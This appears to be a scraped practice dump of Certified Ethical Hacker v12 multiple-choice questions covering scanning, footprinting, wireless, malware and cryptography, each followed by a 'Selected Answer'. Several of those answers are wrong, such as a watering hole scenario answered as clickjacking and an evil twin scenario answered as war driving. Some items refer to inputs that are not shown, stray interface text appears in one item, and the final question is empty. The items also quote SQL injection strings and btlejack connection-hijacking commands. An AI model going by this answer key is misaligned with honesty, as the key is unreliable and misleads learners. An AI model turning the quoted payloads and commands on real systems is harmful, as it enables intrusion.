Certified Ethical Hacker v12 Topic 1
Question #: 288
Topic #: 1
Jack, a professional hacker, targets an organization and performs vulnerability scanning on the target web server to identify any possible weaknesses, vulnerabilities, and misconfigurations. In this process, Jack uses an automated tool that eases his work and performs vulnerability scanning to find hosts, services, and other vulnerabilities in the target server.
Which of the following tools is used by Jack to perform vulnerability scanning?
A. Infoga
B. NCollector Studio
C. Netsparker
D. WebCopier Pro
Selected Answer: C
Question #: 219
Topic #: 1
You have been hired as an intern at a start-up company. Your first task is to help set up a basic web server for the company’s new website. The team leader has asked you to make sure the server is secure from common threats. Based on your knowledge from studying for the CEH exam, which of the following actions should be your priority to secure the web server?
A. Limiting the number of concurrent connections to the server
B. Installing a web application firewall
C. Regularly updating and patching the server software
D. Encrypting the company’s website with SSL/TLS
Selected Answer: D
Question #: 159
Topic #: 1
A certified ethical hacker is conducting a Whois footprinting activity on a specific domain. The individual is leveraging various tools such as Batch IP Converter and Whois Analyzer Pro to retrieve vital details but is unable to gather complete Whois information from the registrar for a particular set of data. As the hacker, what might be the probable data model being utilized by the domain’s registrar for storing and looking up Whois information?
A. Thin Whois model working correctly
B. Thin Whois model with a malfunctioning server
C. Thick Whois model with a malfunctioning server
D. Thick Whois model working correctly
Selected Answer: A
Question #: 144
Topic #: 1
You are a cybersecurity consultant for a major airport that offers free Wi-Fi to travelers. The management is concerned about the possibility of “Evil Twin” attacks, where a malicious actor sets up a rogue access point that mimics the legitimate one. They are looking for a solution that would not significantly impact the user experience or require travelers to install additional software. What is the most effective security measure you could recommend that fits these constraints, considering the airport’s unique operational environment?
A. Regularly change the SSID of the airport’s Wi-Fi network
B. Use MAC address filtering on the airport’s Wi-Fi network
C. Implement WPA3 encryption for the airport’s Wi-Fi network
D. Display a captive portal page that warns users about the possibility of Evil Twin attacks
Selected Answer: D
Question #: 35
Topic #: 1
Scenario: Joe turns on his home computer to access personal online banking. When he enters the URL www.bank.com, the website is displayed, but it prompts him to re-enter his credentials as if he has never visited the site before. When he examines the website URL closer, he finds that the site is not secure and the web address appears different.
What type of attack he is experiencing?
A. DHCP spoofing
B. DoS attack
C. ARP cache poisoning
D. DNS hijacking
Selected Answer: D
Question #: 180
Topic #: 1
During a reconnaissance mission, an ethical hacker uses Maltego, a popular footprinting tool, to collect information about a target organization. The information includes the target’s Internet infrastructure details (domains, DNS names, Netblocks, IP address information). The hacker decides to use social engineering techniques to gain further information. Which of the following would be the least likely method of social engineering to yield beneficial information based on the data collected?
A. Dumpster diving in the target company’s trash bins for valuable printouts
B. Impersonating an ISP technical support agent to trick the target into providing further network details
C. Shoulder surfing to observe sensitive credentials input on the target’s computers
D. Eavesdropping on internal corporate conversations to understand key topics
Selected Answer: A
Question #: 18
Topic #: 1
Robin, a professional hacker, targeted an organization’s network to sniff all the traffic. During this process, Robin plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the network.
What is the attack performed by Robin in the above scenario?
A. ARP spoofing attack
B. STP attack
C. DNS poisoning attack
D. VLAN hopping attack
Selected Answer: B
Question #: 120
Topic #: 1
Which of the following protocols can be used to secure an LDAP service against anonymous queries?
A. NTLM
B. RADIUS
C. WPA
D. SSO
Selected Answer: A
Question #: 17
Topic #: 1
Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection.
What is the APT lifecycle phase that Harry is currently executing?
A. Initial intrusion
B. Persistence
C. Cleanup
D. Preparation
Selected Answer: A
Question #: 278
Topic #: 1
Which of the following types of SQL injection attacks extends the results returned by the original query, enabling attackers to run two or more statements if they have the same structure as the original one?
A. Union SQL injection
B. Error-based injection
C. Blind SQL injection
D. Boolean-based blind SQL injection
Selected Answer: A
Question #: 30
Topic #: 1
Sophia is a shopping enthusiast who spends significant time searching for trendy outfits online. Clark, an attacker, noticed her activities several times and sent a fake email containing a deceptive page link to her social media page displaying all-new and trendy outfits. In excitement, Sophia clicked on the malicious link and logged in to that page using her valid credentials.
Which of the following tools is employed by Clark to create the spoofed email?
A. Evilginx
B. Slowloris
C. PLCinject
D. PyLoris
Selected Answer: A
Question #: 92
Topic #: 1
Mike, a security engineer, was recently hired by BigFox Ltd. The company recently experienced disastrous DoS attacks. The management had instructed Mike to build defensive strategies for the company’s IT infrastructure to thwart DoS/DDoS attacks. Mike deployed some countermeasures to handle jamming and scrambling attacks.
What is the countermeasure Mike applied to defend against jamming and scrambling attacks?
A. Allow the transmission of all types of addressed packets at the ISP level
B. Disable TCP SYN cookie protection
C. Allow the usage of functions such as gets and strcpy
D. Implement cognitive radios in the physical layer
Selected Answer: D
Question #: 283
Topic #: 1
An attacker identified that a user and an access point are both compatible with WPA2 and WPA3 encryption. The attacker installed a rogue access point with only WPA2 compatibility in the vicinity and forced the victim to go through the WPA2 four-way handshake to get connected. After the connection was established, the attacker used automated tools to crack WPA2-encrypted messages.
What is the attack performed in the above scenario?
A. Cache-based attack
B. Timing-based attack
C. Downgrade security attack
D. Side-channel attack
Selected Answer: C
Question #: 297
Topic #: 1
Dayn, an attacker, wanted to detect if any honeypots are installed in a target network. For this purpose, he used a time-based TCP fingerprinting method to validate the response to a normal computer and the response of a honeypot to a manual SYN request.
Which of the following techniques is employed by Dayn to detect honeypots?
A. Detecting honeypots running on VMware
B. Detecting the presence of Snort_inline honeypots
C. Detecting the presence of Honeyd honeypots
D. Detecting the presence of Sebek-based honeypots
Selected Answer: C
Question #: 260
Topic #: 1
John, a professional hacker, targeted CyberSol Inc., an MNC. He decided to discover the IoT devices connected in the target network that are using default credentials and are vulnerable to various hijacking attacks. For this purpose, he used an automated tool to scan the target network for specific types of IoT devices and detect whether they are using the default, factory-set credentials.
What is the tool employed by John in the above scenario?
A. IoT Inspector
B. AT&T IoT Platform
C. IoTSeeker
D. Azure IoT Central
Selected Answer: C
Question #: 54
Topic #: 1
Jude, a pen tester, examined a network from a hacker’s perspective to identify exploits and vulnerabilities accessible to the outside world by using devices such as firewalls, routers, and servers. In this process, he also estimated the threat of network security attacks and determined the level of security of the corporate network.
What is the type of vulnerability assessment that Jude performed on the organization?
A. Application assessment
B. External assessment
C. Passive assessment
D. Host-based assessment
Selected Answer: B
Question #: 290
Topic #: 1
In an attempt to damage the reputation of a competitor organization, Hailey, a professional hacker, gathers a list of employee and client email addresses and other related information by using various search engines, social networking sites, and web spidering tools. In this process, she also uses an automated tool to gather a list of words from the target website to further perform a brute-force attack on the previously gathered email addresses.
What is the tool used by Hailey for gathering a list of words from the target website?
A. CeWL
B. Orbot
C. Shadowsocks
D. Psiphon
Selected Answer: A
Question #: 307
Topic #: 1
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced.
Which of the following techniques is described in the above scenario?
A. Website footprinting
B. Dark web footprinting
C. VPN footprinting
D. VoIP footprinting
Selected Answer: B
Question #: 69
Topic #: 1
Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection.
Identify the behavior of the adversary in the above scenario.
A. Unspecified proxy activities
B. Use of command-line interface
C. Data staging
D. Use of DNS tunneling
Selected Answer: A
Question #: 106
Topic #: 1
Attacker Simon targeted the communication network of an organization and disabled the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. He then extracted all the non-network logon tokens from all the active processes to masquerade as a legitimate user to launch further attacks.
What is the type of attack performed by Simon?
A. Combinator attack
B. Dictionary attack
C. Rainbow table attack
D. Internal monologue attack
Selected Answer: D
Question #: 31
Topic #: 1
John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to identify vulnerabilities to perform further exploitation.
What is the type of vulnerability assessment tool employed by John in the above scenario?
A. Agent-based scanner
B. Network-based scanner
C. Cluster scanner
D. Proxy scanner
Selected Answer: A
Question #: 111
Topic #: 1
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson’s machine.
What is the social engineering technique Steve employed in the above scenario?
A. Diversion theft
B. Quid pro quo
C. Elicitation
D. Phishing
Selected Answer: C
Question #: 165
Topic #: 1
An experienced cyber attacker has created a fake LinkedIn profile, successfully impersonating a high-ranking official from a well-established company, to execute a social engineering attack. The attacker then connected with other employees within the organization, receiving invitations to exclusive corporate events and gaining access to proprietary project details shared within the network. What advanced social engineering technique has the attacker primarily used to exploit the system and what is the most likely immediate threat to the organization?
A. Whaling and Targeted Attacks
B. Pretexting and Network Vulnerability
C. Spear Phishing and Spam
D. Baiting and Involuntary Data Leakage
Selected Answer: B
Question #: 176
Topic #: 1
In an advanced digital security scenario, a multinational enterprise is being targeted with a complex series of assaults aimed to disrupt operations, manipulate data integrity, and cause serious financial damage. As the Lead Cybersecurity Analyst with CEH and CISSP certifications, your responsibility is to correctly identify the specific type of attack based on the following indicators:
The attacks are exploiting a vulnerability in the target system’s hardware, inducing misprediction of future instructions in a program’s control flow. The attackers are strategically inducing the victim process to speculatively execute instructions sequences that would not have been executed in the absence of the misprediction, leading to subtle side effects. These side effects, which are observable from the shared state, are then utilized to infer the values of in-flight data.
What type of attack best describes this scenario?
A. Rowhammer Attack
B. Watering Hole Attack
C. Side-Channel Attack
D. Privilege Escalation Attack
Selected Answer: C
Question #: 141
Topic #: 1
An organization suspects a persistent threat from a cybercriminal. They hire an ethical hacker, John, to evaluate their system security. John identifies several vulnerabilities and advises the organization on preventive measures. However, the organization has limited resources and opts to fix only the most severe vulnerability. Subsequently, a data breach occurs exploiting a different vulnerability. Which of the following statements best describes this scenario?
A. The organization is at fault because it did not fix all identified vulnerabilities.
B. Both the organization and John share responsibility because they did not adequately manage the vulnerabilities.
C. John is at fault because he did not emphasize the necessity of patching all vulnerabilities.
D. The organization is not at fault because they used their resources as per their understanding.
Selected Answer: A
Question #: 129
Topic #: 1
A skilled ethical hacker was assigned to perform a thorough OS discovery on a potential target. They decided to adopt an advanced fingerprinting technique and sent a TCP packet to an open TCP port with specific flags enabled. Upon receiving the reply, they noticed the flags were SYN and ECN-Echo. Which test did the ethical hacker conduct and why was this specific approach adopted?
A. Test 3: The test was executed to observe the response of the target system when a packet with URC, PSH, SYN, and FIN flags was sent, thereby identifying the OS
B. Test 2: This test was chosen because a TCP packet with no flags enabled is known as a NULL packet and this would allow the hacker to assess the OS of the target
C. Test 1: The test was conducted because SYN and ECN-Echo flags enabled to allow the hacker to probe the nature of the response and subsequently determine the OS fingerprint
D. Test 6: The hacker selected this test because a TCP packet with the ACK flag enabled sent to a closed TCP port would yield more information about the OS
Selected Answer: C
Question #: 114
Topic #: 1
Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed.
What is the port scanning technique used by Sam to discover open ports?
A. Xmas scan
B. IDLE/IPID header scan
C. TCP Maimon scan
D. ACK flag probe scan
Selected Answer: C
Question #: 113
Topic #: 1
Which of the following Metasploit post-exploitation modules can be used to escalate privileges on Windows systems?
A. getsystem
B. getuid
C. keylogrecorder
D. autoroute
Selected Answer: A
Question #: 294
Topic #: 1
Jake, a professional hacker, installed spyware on a target iPhone to spy on the target user’s activities. He can take complete control of the target mobile device by jailbreaking the device remotely and record audio, capture screenshots, and monitor all phone calls and SMS messages.
What is the type of spyware that Jake used to infect the target device?
A. DroidSheep
B. Androrat
C. Trident
D. Zscaler
Selected Answer: B
Question #: 1
Topic #: 1
In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?
A. IDEA
B. Triple Data Encryption Standard
C. AES
D. MD5 encryption algorithm
Selected Answer: B
Question #: 140
Topic #: 1
XYZ company recently discovered a potential vulnerability on their network, originating from misconfigurations. It was found that some of their host servers had enabled debugging functions and unknown users were granted administrative permissions. As a Certified Ethical Hacker, what would be the most potent risk associated with this misconfiguration?
A. An attacker may be able to inject a malicious DLL into the current running process
B. Weak encryption might be allowing man-in-the-middle attacks, leading to data tampering
C. Unauthorized users may perform privilege escalation using unnecessarily created accounts
D. An attacker may carry out a Denial-of-Service assault draining the resources of the server in the process
Selected Answer: C
Question #: 29
Topic #: 1
Nicolas just found a vulnerability on a public-facing system that is considered a zero-day vulnerability. He sent an email to the owner of the public system describing the problem and how the owner can protect themselves from that vulnerability. He also sent an email to Microsoft informing them of the problem that their systems are exposed to.
What type of hacker is Nicolas?
A. Black hat
B. White hat
C. Gray hat
D. Red hat
Selected Answer: C
Question #: 303
Topic #: 1
Which Nmap switch helps evade IDS or firewalls?
A. -D
B. -n/-R
C. -T
D. -oN/-oX/-oG
Selected Answer: C
Question #: 146
Topic #: 1
You are an ethical hacker tasked with conducting an enumeration of a company’s network. Given a Windows Answered Marked for Review 37.6% system with NetBIOS enabled, port 139 open, and file and printer sharing active, you are about to run some nbtstat commands to enumerate NetBIOS names. The company uses IPv6 for its network. Which of the following actions should you take next?
A. Switch to an enumeration tool that supports IPv6
B. Use nbtstat -a followed by the IPv6 address of the target machine
C. Use nbtstat -c to get the contents of the NetBIOS name cache
D. Utilize Nmap Scripting Engine (NSE) for NetBIOS enumeration
Selected Answer: B
Question #: 139
Topic #: 1
You are a cybersecurity consultant for a global organization. The organization has adopted a Bring Your Own Device (BYOD)policy, but they have recently experienced a phishing incident where an employee’s device was compromised. In the investigation, you discovered that the phishing attack occurred through a third-party email app that the employee had installed. Given the need to balance security and user autonomy under the BYOD policy, how should the organization mitigate the risk of such incidents? Moreover, consider a measure that would prevent similar attacks without overly restricting the use of personal devices.
A. Provide employees with corporate-owned devices for work-related tasks.
B. Require all employee devices to use a company-provided VPN for internet access.
C. Implement a mobile device management solution that restricts the installation of non-approved applications.
D. Conduct regular cybersecurity awareness training, focusing on phishing attacks.
Selected Answer: D
Question #: 137
Topic #: 1
A malicious user has acquired a Ticket Granting Service from the domain controller using a valid user’s Ticket Granting Ticket in a Kerberoasting attack. He exhorted the TGS tickets from memory for offline cracking. But the attacker was stopped before he could complete his attack. The system administrator needs to investigate and remediate the potential breach. What should be the immediate step the system administrator takes?
A. Perform a system reboot to clear the memory
B. Delete the compromised user’s account
C. Change the NTLM password hash used to encrypt the ST
D. Invalidate the TGS the attacker acquired
Selected Answer: C
Question #: 220
Topic #: 1
A sophisticated attacker targets your web server with the intent to execute a Denial of Service (DoS) attack. His strategy involves a unique mixture of TCP SYN, UDP, and ICMP floods, using ‘r’ packets per second. Your server, reinforced with advanced security measures, can handle ‘h’ packets per second before it starts showing signs of strain. If ‘r’ surpasses ‘h’, it overwhelms the server, causing it to become unresponsive. In a peculiar pattern, the attacker selects ‘r’ as a composite number and ‘h’ as a prime number, making the attack detection more challenging. Considering ‘r=2010’ and different values for ‘h’, which of the following scenarios would potentially cause the server to falter?
A. h=1987 (prime): The attacker’s packet rate exceeds the server’s capacity, causing potential unresponsiveness.
B. h=1999 (prime): Despite the attacker’s packet flood, the server can handle these requests, remaining responsive.
C. h=1993 (prime): Despite being less than ‘r’, the server’s prime number capacity keeps it barely operational, but the risk of falling is imminent.
D. h=2003 (prime): The server can manage more packets than the attacker is sending, hence it stays operational.
Selected Answer: A
Question #: 218
Topic #: 1
An ethical hacker is testing the security of a website’s database system against SQL Injection attacks. They discover that the IDS has a strong signature detection mechanism to detect typical SQL injection patterns. Which evasion technique can be most effectively used to bypass the IDS signature detection while performing a SQL Injection attack?
A. Employ IP fragmentation to obscure the attack payload
B. Implement case variation by altering the case of SQL statements
C. Leverage string concatenation to break identifiable keywords
D. Use Hex encoding to represent the SQL query string
Selected Answer: D
Question #: 213
Topic #: 1
As the chief security officer at SecureMobile, you are overseeing the development of a mobile banking application. You are aware of the potential risks of man-in-the-middle (MitM) attacks where an attacker might intercept communication between the app and the bank’s servers. Recently, you have learned about a technique used by attackers where they use rogue Wi-Fi hotspots to conduct MitM attacks. To prevent this type of attack, you plan to implement a security feature in the mobile app. What should this feature accomplish?
A. It should require two-factor authentication for user logins.
B. It should prevent the app from communicating over a network if it detects a rogue access point.
C. It should prevent the app from connecting to any unencrypted Wi-Fi networks.
D. It should require users to change their password every 30 days.
Selected Answer: C
Question #: 211
Topic #: 1
As a certified ethical hacker, you are tasked with gaining information about an enterprise’s internal network. You are permitted to test the network’s security using enumeration techniques. You successfully obtain a list of usernames using email IDs and execute a DNS Zone Transfer. Which enumeration technique would be most effective for your next move given that you have identified open TCP ports 25 (SMTP) and 139 (NetBIOS Session Service)?
A. Perform a brute force attack on Microsoft Active Directory to extract valid usernames
B. Exploit the NetBIOS Session Service on TCP port 139 to gain unauthorized access to the file system
C. Use SNMP to extract usernames given the community strings
D. Exploit the NFS protocol on TCP port 2049 to gain control over a remote system
Selected Answer: B
Question #: 207
Topic #: 1
A multinational corporation’s computer system was infiltrated by an advanced persistent threat (APT). During forensic analysis, it was discovered that the malware was utilizing a blend of two highly sophisticated techniques to stay undetected and continue its operations.
Firstly, the malware was embedding its harmful code into the actual binary or executable part of genuine system files rather than appending or prepending itself to the files. This made it exceptionally difficult to detect and eradicate, as doing so risked damaging the system files themselves.
Secondly, the malware exhibited characteristics of a type of malware that changes its code as it propagates, making signature-based detection approaches nearly impossible.
On top of these, the malware maintained a persistent presence by installing itself in the registry, making it able to survive system reboots.
Given these distinctive characteristics, which two types of malware techniques does this malware most closely embody?
A. Polymorphic and Metamorphic malware
B. Polymorphic and Macro malware
C. Macro and Rootkit malware
D. Metamorphic and Rootkit malware
Selected Answer: A
Question #: 38
Topic #: 1
Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/password form, you enter the following credentials:
Based on the above credentials, which of the following SQL commands are you expecting to be executed by the server, if there is indeed an SQL injection vulnerability?
A. select * from Users where UserName = ‘attack’ ’ or 1=1 — and UserPassword = ‘123456’
B. select * from Users where UserName = ‘attack’ or 1=1 — and UserPassword = ‘123456’
C. select * from Users where UserName = ‘attack or 1=1 — and UserPassword = ‘123456’
D. select * from Users where UserName = ‘attack’ or 1=1 –’ and UserPassword = ‘123456’
Selected Answer: D
Question #: 210
Topic #: 1
During a red team engagement, an ethical hacker is tasked with testing the security measures of an organization’s wireless network. The hacker needs to select an appropriate tool to carry out a session hijacking attack. Which of the following tools should the hacker use to effectively perform session hijacking and subsequent security analysis, given that the target wireless network has the Wi-Fi Protected Access-pre-shared key (WPA-PSK) security protocol in place?
A. Hetty
B. bettercap
C. DroidSheep
D. FaceNiff
Selected Answer: B
Question #: 150
Topic #: 1
A large organization has recently performed a vulnerability assessment using Nessus Professional, and the security team is now preparing the final report. They have identified a high-risk vulnerability, named XYZ, which could potentially allow unauthorized access to the network. In preparing the report, which of the following elements would NOT be typically included in the detailed documentation for this specific vulnerability?
A. Proof of concept (PoC) of the vulnerability, if possible, to demonstrate its potential impact on the system.
B. The total number of high, medium, and low-risk vulnerabilities detected throughout the network.
C. The list of all affected systems within the organization that are susceptible to the identified vulnerability.
D. The CVE ID of the vulnerability and its mapping to the vulnerability’s name, XYZ.
Selected Answer: B
Question #: 195
Topic #: 1
A Certified Ethical Hacker (CEH) is analyzing a target network. To do this, he decides to utilize an IDLE/IPID header scan using Nmap. The network analysis reveals that the IPID number increases by 2 after following the steps of an IDLE scan. Based on this information, what can the CEH conclude about the target network?
A. The ports on the target network are open
B. The target network has no firewall present
C. The ports on the target network are closed
D. The target network has a stateful firewall present
Selected Answer: A
Question #: 160
Topic #: 1
You are a cybersecurity professional managing cryptographic systems for a global corporation. The company uses a mix of Elliptic Curve Cryptography (ECC) for key exchange and symmetric encryption algorithms for data encryption. The time complexity of ECC key pair generation is O(n^3), where ‘n’ is the size of the key. An advanced threat actor group has a quantum computer that can potentially break ECC with a time complexity of O((log n)^2). Given that the ECC key size is ‘n=512’ and varying symmetric encryption algorithms and key sizes, which scenario would provide the best balance of security and performance?
A. Data encryption with AES-128: Provides moderate security and fast encryption, offering a balance between the two.
B. Data encryption with AES-256: Provides high security with better performance than 3DES, but not as fast as other AES key sizes.
C. Data encryption with 3DES using a 168-bit key: Offers high security but slower performance due to 3DES’s inherent inefficiencies.
D. Data encryption with Blowfish using a 448-bit key: Offers high security but potential compatibility issues due to Blowfish’s less widespread use.
Selected Answer: B
Question #: 234
Topic #: 1
As a cybersecurity consultant for SafePath Corp, you have been tasked with implementing a system for secure email communication. The key requirement is to ensure both confidentiality and non-repudiation. While considering various encryption methods, you are inclined towards using a combination of symmetric and asymmetric cryptography. However, you are unsure which cryptographic technique would best serve the purpose. Which of the following options would you choose to meet these requirements?
A. Apply asymmetric encryption with RSA and use the private key for signing.
B. Use the Diffie-Hellman protocol for key exchange and encryption.
C. Apply asymmetric encryption with RSA and use the public key for encryption.
D. Use symmetric encryption with the AES algorithm.
Selected Answer: A
Question #: 32
Topic #: 1
Joel, a professional hacker, targeted a company and identified the types of websites frequently visited by its employees. Using this information, he searched for possible loopholes in these websites and injected a malicious script that can redirect users from the web page and download malware onto a victim’s machine. Joel waits for the victim to access the infected web application so as to compromise the victim’s machine.
Which of the following techniques is used by Joel in the above scenario?
A. Watering hole attack
B. DNS rebinding attack
C. MarioNet attack
D. Clickjacking attack
Selected Answer: D
Question #: 167
Topic #: 1
A certified ethical hacker is carrying out an email footprinting exercise on a targeted organization using eMailTrackerPro. They want to map out detailed information about the recipient’s activities after receiving the email. Which among the following pieces of information would NOT be directly obtained from eMailTrackerPro during this exercise?
A. Geolocation of the recipient
B. Type of device used to open the email
C. The email accounts related to the domain of the organization
D. The time recipient spent reading the email
Selected Answer: C
Question #: 28
Topic #: 1
To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first collects information about a large number of vulnerable machines to create a list. Subsequently, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time.
Which technique is discussed here?
A. Subnet scanning technique
B. Permutation scanning technique
C. Hit-list scanning technique.
D. Topological scanning technique
Selected Answer: C
Question #: 27
Topic #: 1
Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.
What is the type of web-service API mentioned in the above scenario?
A. RESTful API
B. JSON-RPC
C. SOAP API
D. REST API
Selected Answer: A
Question #: 26
Topic #: 1
What piece of hardware on a computer’s motherboard generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is not possible?
A. CPU
B. UEFI
C. GPU
D. TPM
Selected Answer: D
Question #: 24
Topic #: 1
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks.
What is the component of the Docker architecture used by Annie in the above scenario?
A. Docker objects
B. Docker daemon
C. Docker client
D. Docker registries
Selected Answer: B
Question #: 23
Topic #: 1
John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on the target organization.
What is the tool employed by John to gather information from the LDAP service?
A. ike-scan
B. Zabasearch
C. JXplorer
D. EarthExplorer
Selected Answer: C
Question #: 21
Topic #: 1
Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider.
In the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?
A. Cloud consumer
B. Cloud broker
C. Cloud auditor
D. Cloud carrier
Selected Answer: D
Question #: 177
Topic #: 1
In the process of implementing a network vulnerability assessment strategy for a tech company, the security analyst is confronted with the following scenarios:
1) A legacy application is discovered on the network, which no longer receives updates from the vendor.
2) Several systems in the network are found running outdated versions of web browsers prone to distributed attacks.
3) The network firewall has been configured using default settings and passwords.
4) Certain TCP/IP protocols used in the organization are inherently insecure.
The security analyst decides to use vulnerability scanning software. Which of the following limitations of vulnerability assessment should the analyst be most cautious about in this context?
A. Vulnerability scanning software cannot define the impact of an identified vulnerability on different business operations
B. Vulnerability scanning software is not immune to software engineering flaws that might lead to serious vulnerabilities being missed
C. Vulnerability scanning software is limited in its ability to detect vulnerabilities at a given point in time
D. Vulnerability scanning software is limited in its ability to perform live tests on web applications to detect errors or unexpected behavior
Selected Answer: A
Question #: 20
Topic #: 1
CyberTech Inc. recently experienced SQL injection attacks on its official website. The company appointed Bob, a security professional, to build and incorporate defensive strategies against such attacks. Bob adopted a practice whereby only a list of entities such as the data type, range, size, and value, which have been approved for secured access, is accepted.
What is the defensive technique employed by Bob in the above scenario?
A. Whitelist validation
B. Output encoding
C. Blacklist validation
D. Enforce least privileges
Selected Answer: A
Question #: 19
Topic #: 1
An attacker utilizes a Wi-Fi Pineapple to run an access point with a legitimate-looking SSID for a nearby business in order to capture the wireless password.
What kind of attack is this?
A. MAC spoofing attack
B. War driving attack
C. Phishing attack
D. Evil-twin attack
Selected Answer: B
Question #: 16
Topic #: 1
Becky has been hired by a client from Dubai to perform a penetration test against one of their remote offices. Working from her location in Columbus, Ohio, Becky runs her usual reconnaissance scans to obtain basic information about their network. When analyzing the results of her Whois search, Becky notices that the IP was allocated to a location in Le Havre, France.
Which regional Internet registry should Becky go to for detailed information?
A. ARIN
B. LACNIC
C. APNIC
D. RIPE
Selected Answer: D
Question #: 15
Topic #: 1
Taylor, a security professional, uses a tool to monitor her company’s website, analyze the website’s traffic, and track the geographical location of the users visiting the company’s website.
Which of the following tools did Taylor employ in the above scenario?
A. Webroot
B. Web-Stat
C. WebSite-Watcher
D. WAFW00F
Selected Answer: B
Question #: 14
Topic #: 1
An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization’s machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests.
What is the type of vulnerability assessment solution that James employed in the above scenario?
A. Service-based solutions
B. Product-based solutions
C. Tree-based assessment
D. Inference-based assessment
Selected Answer: D
Question #: 52
Topic #: 1
Clark, a professional hacker, was hired by an organization to gather sensitive information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whois footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network.
What is the online tool employed by Clark in the above scenario?
A. DuckDuckGo
B. AOL
C. ARIN
D. Baidu
Selected Answer: C
Question #: 289
Topic #: 1
Stephen, an attacker, targeted the industrial control systems of an organization. He generated a fraudulent email with a malicious attachment and sent it to employees of the target organization. An employee who manages the sales software of the operational plant opened the fraudulent email and clicked on the malicious attachment. This resulted in the malicious attachment being downloaded and malware being injected into the sales software maintained in the victim’s system. Further, the malware propagated itself to other networked systems, finally damaging the industrial automation components.
What is the attack technique used by Stephen to damage the industrial systems?
A. HMI-based attack
B. SMishing attack
C. Reconnaissance attack
D. Spear-phishing attack
Selected Answer: D
Question #: 280
Topic #: 1
Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the following input?
A. SQLi
B. XXE
C. XXS
D. IDOR
Selected Answer: B
Question #: 259
Topic #: 1
Clark, a professional hacker, attempted to perform a Btlejacking attack using an automated tool, Btlejack, and hardware tool, micro:bit. This attack allowed Clark to hijack, read, and export sensitive information shared between connected devices. To perform this attack, Clark executed various btlejack commands.
Which of the following commands was used by Clark to hijack the connections?
A. btlejack -f 0x9c68fd30 -t -m 0x1fffffffff
B. btlejack -c any
C. btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s
D. btlejack -f 0x129f3244 -j
Selected Answer: A
Question #: 250
Topic #: 1
A bank stores and processes sensitive privacy information related to home loans. However, auditing has never been enabled on the system. What is the first step that the bank should take before enabling the audit feature?
A. Perform a vulnerability scan of the system.
B. Determine the impact of enabling the audit feature.
C. Perform a cost/benefit analysis of the audit feature.
D. Allocate funds for staffing of audit log review.
Selected Answer: B
Question #: 244
Topic #: 1
As a budding cybersecurity enthusiast, you have set up a small lab at home to learn more about wireless network security. While experimenting with your home Wi-Fi network, you decide to use a well-known hacking tool to capture network traffic and attempt to crack the Wi-Fi password. However, despite many attempts, you have been unsuccessful. Your home Wi-Fi network uses WPA2 Personal with AES encryption. Why are you finding it difficult to crack the Wi-Fi password?
A. Your hacking tool is outdated.
B. The Wi-Fi password is too complex and long.
C. The network is using an uncrackable encryption method.
D. The network is using MAC address filtering.
Selected Answer: B
Question #: 238
Topic #: 1
As an IT Security Analyst, you’ve been asked to review the security measures of an e-commerce website that relies on a SQL database for storing sensitive customer data. Recently, an anonymous tip has alerted you to a possible threat: a seasoned hacker who specializes in SQL Injection attacks may be targeting your system. The site already employs input validation measures to prevent basic injection attacks, and it blocks any user inputs containing suspicious patterns. However, this hacker is known to use advanced SQL Injection techniques. Given this situation, which of the following strategies would the hacker most likely adopt to bypass your security measures?
A. The hacker might employ a ‘blind’ SQL Injection attack, taking advantage of the application’s true or false responses to extract data bit by bit
B. The hacker may resort to a DDoS attack instead, attempting to crash the server and thus render the e-commerce site unavailable
C. The hacker may try to use SQL commands which are less known and less likely to be blocked by your system’s security
D. The hacker could deploy an ‘out-of-band’ SQL Injection attack, extracting data via a different communication channel, such as DNS or HTTP requests
Selected Answer: A
Question #: 230
Topic #: 1
